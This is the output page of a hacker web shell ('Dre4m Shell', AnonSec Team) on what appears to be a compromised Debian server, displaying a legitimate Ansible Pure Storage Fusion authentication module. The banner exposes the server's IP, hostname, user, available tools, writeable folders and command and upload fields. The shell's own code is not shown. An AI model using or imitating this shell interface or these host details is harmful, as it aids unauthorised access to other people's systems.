Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.146.37.217
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ansible_collections/purestorage/fusion/plugins/module_utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/python3/dist-packages/ansible_collections/purestorage/fusion/plugins/module_utils/fusion.py
# -*- coding: utf-8 -*-

# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Copyright (c), Simon Dodsley <simon@purestorage.com>,2021
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
#    * Redistributions of source code must retain the above copyright
#      notice, this list of conditions and the following disclaimer.
#    * Redistributions in binary form must reproduce the above copyright notice,
#      this list of conditions and the following disclaimer in the documentation
#      and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

from __future__ import absolute_import, division, print_function

__metaclass__ = type

try:
    import fusion
except ImportError:
    pass

from os import environ
from urllib.parse import urljoin
import platform

TOKEN_EXCHANGE_URL = "https://api.pure1.purestorage.com/oauth2/1.0/token"
VERSION = 1.0
USER_AGENT_BASE = "Ansible"

PARAM_ISSUER_ID = "issuer_id"
PARAM_PRIVATE_KEY_FILE = "private_key_file"
PARAM_PRIVATE_KEY_PASSWORD = "private_key_password"
PARAM_ACCESS_TOKEN = "access_token"
ENV_ISSUER_ID = "FUSION_ISSUER_ID"
ENV_API_HOST = "FUSION_API_HOST"
ENV_PRIVATE_KEY_FILE = "FUSION_PRIVATE_KEY_FILE"
ENV_TOKEN_ENDPOINT = "FUSION_TOKEN_ENDPOINT"
ENV_ACCESS_TOKEN = "FUSION_ACCESS_TOKEN"

# will be deprecated in 2.0.0
PARAM_APP_ID = "app_id"  # replaced by PARAM_ISSUER_ID
PARAM_KEY_FILE = "key_file"  # replaced by PARAM_PRIVATE_KEY_FILE
ENV_APP_ID = "FUSION_APP_ID"  # replaced by ENV_ISSUER_ID
ENV_HOST = "FUSION_HOST"  # replaced by ENV_API_HOST
DEP_VER = "2.0.0"
BASE_PATH = "/api/1.1"


def _env_deprecation_warning(module, old_env, new_env, vers):
    if old_env in environ:
        if new_env in environ:
            module.warn(
                f"{old_env} env variable is ignored because {new_env} is specified."
                f" {old_env} env variable is deprecated and will be removed in version {vers}"
                f" Please use {new_env} env variable only."
            )
        else:
            module.warn(
                f"{old_env} env variable is deprecated and will be removed in version {vers}"
                f" Please use {new_env} env variable instead."
            )


def _param_deprecation_warning(module, old_param, new_param, vers):
    if old_param in module.params:
        module.warn(
            f"{old_param} parameter is deprecated and will be removed in version {vers}"
            f" Please use {new_param} parameter instead."
            f" Don't use both parameters simultaneously."
        )


def get_fusion(module):
    """Return System Object or Fail"""
    # deprecation warnings
    _param_deprecation_warning(module, PARAM_APP_ID, PARAM_ISSUER_ID, DEP_VER)
    _param_deprecation_warning(module, PARAM_KEY_FILE, PARAM_PRIVATE_KEY_FILE, DEP_VER)
    _env_deprecation_warning(module, ENV_APP_ID, ENV_ISSUER_ID, DEP_VER)
    _env_deprecation_warning(module, ENV_HOST, ENV_API_HOST, DEP_VER)

    user_agent = "%(base)s %(class)s/%(version)s (%(platform)s)" % {
        "base": USER_AGENT_BASE,
        "class": __name__,
        "version": VERSION,
        "platform": platform.platform(),
    }

    issuer_id = module.params[PARAM_ISSUER_ID]
    access_token = module.params[PARAM_ACCESS_TOKEN]
    private_key_file = module.params[PARAM_PRIVATE_KEY_FILE]
    private_key_password = module.params[PARAM_PRIVATE_KEY_PASSWORD]

    if private_key_password is not None:
        module.fail_on_missing_params([PARAM_PRIVATE_KEY_FILE])

    config = fusion.Configuration()
    if ENV_API_HOST in environ or ENV_HOST in environ:
        host_url = environ.get(ENV_API_HOST, environ.get(ENV_HOST))
        config.host = urljoin(host_url, BASE_PATH)
    config.token_endpoint = environ.get(ENV_TOKEN_ENDPOINT, config.token_endpoint)

    if access_token is not None:
        config.access_token = access_token
    elif issuer_id is not None and private_key_file is not None:
        config.issuer_id = issuer_id
        config.private_key_file = private_key_file
        if private_key_password is not None:
            config.private_key_password = private_key_password
    elif ENV_ACCESS_TOKEN in environ:
        config.access_token = environ.get(ENV_ACCESS_TOKEN)
    elif (
        ENV_ISSUER_ID in environ or ENV_APP_ID in environ
    ) and ENV_PRIVATE_KEY_FILE in environ:
        config.issuer_id = environ.get(ENV_ISSUER_ID, environ.get(ENV_APP_ID))
        config.private_key_file = environ.get(ENV_PRIVATE_KEY_FILE)
    else:
        module.fail_json(
            msg=f"You must set either {ENV_ISSUER_ID} and {ENV_PRIVATE_KEY_FILE} or {ENV_ACCESS_TOKEN} environment variables. "
            f"Or module arguments either {PARAM_ISSUER_ID} and {PARAM_PRIVATE_KEY_FILE} or {PARAM_ACCESS_TOKEN}"
        )

    try:
        client = fusion.ApiClient(config)
        client.set_default_header("User-Agent", user_agent)
        api_instance = fusion.DefaultApi(client)
        api_instance.get_version()
    except Exception as err:
        module.fail_json(msg="Fusion authentication failed: {0}".format(err))

    return client


def fusion_argument_spec():
    """Return standard base dictionary used for the argument_spec argument in AnsibleModule"""

    return {
        PARAM_ISSUER_ID: {
            "no_log": True,
            "aliases": [PARAM_APP_ID],
            "deprecated_aliases": [
                {
                    "name": PARAM_APP_ID,
                    "version": DEP_VER,
                    "collection_name": "purefusion.fusion",
                }
            ],
        },
        PARAM_PRIVATE_KEY_FILE: {
            "no_log": False,
            "aliases": [PARAM_KEY_FILE],
            "deprecated_aliases": [
                {
                    "name": PARAM_KEY_FILE,
                    "version": DEP_VER,
                    "collection_name": "purefusion.fusion",
                }
            ],
        },
        PARAM_PRIVATE_KEY_PASSWORD: {
            "no_log": True,
        },
        PARAM_ACCESS_TOKEN: {
            "no_log": True,
        },
    }

Anon7 - 2022
AnonSec Team